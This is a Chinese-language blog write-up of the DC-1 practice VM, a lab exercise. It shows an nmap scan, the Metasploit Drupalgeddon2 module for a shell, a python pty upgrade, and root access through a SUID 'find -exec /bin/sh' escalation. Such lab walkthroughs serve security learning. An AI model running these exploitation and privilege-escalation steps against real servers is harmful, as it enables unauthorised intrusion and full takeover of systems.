美文网首页框架建设收集渗透攻防实战
DC-1渗透实战(find提权初探)

DC-1渗透实战(find提权初探)

作者: 城市烈人 | 来源:发表于2019-04-17 10:59 被阅读153次

靶机的难度不大,但首次接触到find提权,新技能get!!!

靶机IP:192.168.8.156

namp全扫

nmap -sS -Pn -A -p- -n 192.168.8.156
image.png

WEB服务是drupal建站,还有一个111端口的 RPC服务

image.png

msf getshell

80web的drupal站点,可以先探测一下是否存在漏洞

image.png

找个最新的试试

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.8.156

哇塞,直接拿下session

image.png

切成交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

find提权

进入靶机的home目录下有个flag4目录,里面的flag4有提示

image.png
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

提权没思路,不妨查找一下靶机的可执行的二进制文件

find / -perm -4000 2> /dev/null
image.png

find提权?是第一次使用,看下国外大黑的博文才知道的

国内总有几个人喜欢翻译国外大黑牛的教程然后去赚取稿费,一点原创精神都没有,既然使用别人的知识,就别再去骗稿费了

国外教程如下图:

image.png

自己来实践一下:

在靶机的可写目录tmp下touch新建一个test文件

touch test
image.png

用find命令检查是否以root用户身份执行命令

find test -exec "whoami" \;

发现是以root用户执行

再使用find命令执行“/ bin / bash”

find test -exec "/bin/sh" \;
image.png

拿到了root的shell

进入root目录下get flag

image.png

总结

1、遇到drupal等CMS建站,建议大家直接先去试试最近的漏洞exp

2、拿到shell后,提权一直是我的弱项,该靶机很好地让我学到了find提权这个新技能

靶机百度云下载
链接:https://pan.baidu.com/s/1j7cWdCxVGdibDfql3os05A
提取码:9a21

相关文章

网友评论

    本文标题:DC-1渗透实战(find提权初探)

    本文链接:https://www.haomeiwen.com/subject/lxugwqtx.html